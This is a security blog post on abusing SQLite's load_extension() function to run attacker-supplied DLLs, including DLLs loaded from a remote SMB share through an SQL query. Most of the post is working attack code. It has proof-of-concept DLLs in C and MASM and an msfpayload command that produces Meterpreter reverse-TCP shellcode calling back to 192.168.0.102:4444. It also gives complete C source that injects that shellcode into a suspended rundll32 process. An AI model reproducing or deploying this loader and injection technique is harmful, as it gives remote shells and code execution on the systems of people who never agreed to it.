Fun with SQLite Load_Extension

What is load_extension?

This interface loads an SQLite extension library from the named file.

int sqlite3_load_extension(
sqlite3 *db, /* Load the extension into this database connection */
const char *zFile, /* Name of the shared library containing extension */
const char *zProc, /* Entry point. Derived from zFile if 0 */
char **pzErrMsg /* Put error message here if not 0 */
);

More information: https://www.sqlite.org/c3ref/load_extension.html
You can use this function to load a SQLite extension. However by default sqlite3_enable_load_extension() is turned off by default to prevent this in SQL injection attacks. You can read more from here https://www.sqlite.org/c3ref/enable_load_extension.html
The syntax would be

select load_extension(‘path\dll’, ‘EP’);

However this path, const char *zFile can be a SMB share too.

Custom DLLs

We can of course code our own malicious DLLs and execute our own malicious code.

#include <windows.h>
/*
 * Author: @OsandaMalith 
 * Website: http://osandamalith.com
 */
BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:  
            MessageBox(0, "You got pwned", "@OsandaMalith", MB_OK | MB_ICONERROR);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
             MessageBox(0, "Unloading DLL", "@OsandaMalith", MB_OK | MB_ICONWARNING);
        break;
    }
    return TRUE;
}
 
int hello() {
    MessageBox(0, "Just Kidding :)", "@OsandaMalith", MB_OK | MB_ICONINFORMATION);
}

We can also use MASM32 to code the DLL which will be extremely small in size.

.386
; Author: @OsandaMalith
; Website: http://osandamalith.com
.MODEL flat,stdcall
OPTION CASEMAP:NONE
Include windows.inc
Include user32.inc
Include kernel32.inc
IncludeLib user32.lib
IncludeLib kernel32.lib
.DATA
AppName db "DLL Skeleton",0
HelloMsg db "Just Kidding :)",0
LoadMsg db "You got Pwned!",0
UnloadMsg db "The DLL is unloaded",0
ThreadCreated db "A thread is created in this process",0
ThreadDestroyed db "A thread is destroyed in this process",0
.code
DllEntry proc hInstance:HINSTANCE, reason:DWORD, reserved1:DWORD
.if reason==DLL_PROCESS_ATTACH
invoke MessageBox,NULL,addr LoadMsg,addr AppName,MB_OK + MB_ICONERROR + MB_RTLREADING
.elseif reason==DLL_PROCESS_DETACH
invoke MessageBox,NULL,addr UnloadMsg,addr AppName,MB_OK + MB_ICONWARNING
.elseif reason==DLL_THREAD_ATTACH
invoke MessageBox,NULL,addr ThreadCreated,addr AppName,MB_OK
.else
invoke MessageBox,NULL,addr ThreadDestroyed,addr AppName,MB_OK
.endif
mov eax,TRUE
ret
DllEntry Endp
hello proc
invoke MessageBox,NULL,addr HelloMsg,addr AppName,MB_OK + MB_ICONINFORMATION + MB_RTLREADING
ret
hello endp
End DllEntry

HTML + DLL

You can check out the drop_and_run project by hasherezade https://github.com/hasherezade/snippets/tree/master/drop_and_run
The demo.html is a file which has our DLL embedded within HTML comments.
So we can embed our malicious DLL code inside a HTML file 🙂

select load_extension('\\192.168.0.100\WinAsm\dll\cdll.html','hello');

Shellcode + GameOver

We can use shellcode and compile our own DLL. For this example I’m using a meterpreter reverse tcp shellcode.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=4444 R| msfencode -e x86/shikata_ga_nai -b '\x00\x0A\x0D' -t c
#include <windows.h>
/*
 * Website: http://osandamalith.com
 */
#define SCSIZE 2048
unsigned char code[SCSIZE] = 
"\xb8\xdc\x16\x51\xba\xdb\xd0\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x83\xc5\x04\x31\x45\x10\x03\x45\x10\x3e\xe3\xad\x52\x37"
"\x0c\x4e\xa3\x27\x84\xab\x92\x75\xf2\xb8\x87\x49\x70\xec\x2b"
"\x22\xd4\x05\xbf\x46\xf1\x2a\x08\xec\x27\x04\x89\xc1\xe7\xca"
"\x49\x40\x94\x10\x9e\xa2\xa5\xda\xd3\xa3\xe2\x07\x1b\xf1\xbb"
"\x4c\x8e\xe5\xc8\x11\x13\x04\x1f\x1e\x2b\x7e\x1a\xe1\xd8\x34"
"\x25\x32\x70\x43\x6d\xaa\xfa\x0b\x4e\xcb\x2f\x48\xb2\x82\x44"
"\xba\x40\x15\x8d\xf3\xa9\x27\xf1\x5f\x94\x87\xfc\x9e\xd0\x20"
"\x1f\xd5\x2a\x53\xa2\xed\xe8\x29\x78\x78\xed\x8a\x0b\xda\xd5"
"\x2b\xdf\xbc\x9e\x20\x94\xcb\xf9\x24\x2b\x18\x72\x50\xa0\x9f"
"\x55\xd0\xf2\xbb\x71\xb8\xa1\xa2\x20\x64\x07\xdb\x33\xc0\xf8"
"\x79\x3f\xe3\xed\xfb\x62\x6c\xc1\x31\x9d\x6c\x4d\x42\xee\x5e"
"\xd2\xf8\x78\xd3\x9b\x26\x7e\x14\xb6\x9e\x10\xeb\x39\xde\x39"
"\x28\x6d\x8e\x51\x99\x0e\x45\xa2\x26\xdb\xc9\xf2\x88\xb4\xa9"
"\xa2\x68\x65\x41\xa9\x66\x5a\x71\xd2\xac\xf3\x1b\x28\x27\x3c"
"\x73\x32\xd1\xd4\x81\x33\x0c\x79\x0c\xd5\x44\x91\x58\x4d\xf1"
"\x08\xc1\x05\x60\xd4\xdc\x63\xa2\x5e\xd2\x94\x6d\x97\x9f\x86"
"\x1a\x57\xea\xf5\x8d\x68\xc1\x90\x31\xfd\xed\x32\x65\x69\xef"
"\x63\x41\x36\x10\x46\xd9\xff\x84\x29\xb6\xff\x48\xaa\x46\x56"
"\x02\xaa\x2e\x0e\x76\xf9\x4b\x51\xa3\x6d\xc0\xc4\x4b\xc4\xb4"
"\x4f\x23\xea\xe3\xb8\xec\x15\xc6\x38\xd1\xc3\x2f\xbf\x23\x66"
"\x5c\x03";

void inline_bzero(void *p, size_t l)
{
    
           BYTE *q = (BYTE *)p;
           size_t x = 0;
           for (x = 0; x < l; x++)
                     *(q++) = 0x00;
}
 
void boom(void);
 
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
        case DLL_PROCESS_ATTACH:
            boom();
            break;
 
        case DLL_PROCESS_DETACH:
            break;
 
        case DLL_THREAD_ATTACH:
            break;
 
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}
 
void boom(void) {
    int error;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    CONTEXT ctx;
    DWORD prot;
   LPVOID ep;

    inline_bzero( &si, sizeof( si ));
    si.cb = sizeof(si);
 
    if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
        ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
        GetThreadContext(pi.hThread, &ctx);
 
       ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 
        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
 
#ifdef _WIN64
       ctx.Rip = (DWORD64)ep;
#else
       ctx.Eip = (DWORD)ep;
#endif
 
        SetThreadContext(pi.hThread,&ctx);
 
        ResumeThread(pi.hThread);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
   ExitThread(0);
}

Mentions:
https://rinige.com/index.php/archives/538/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s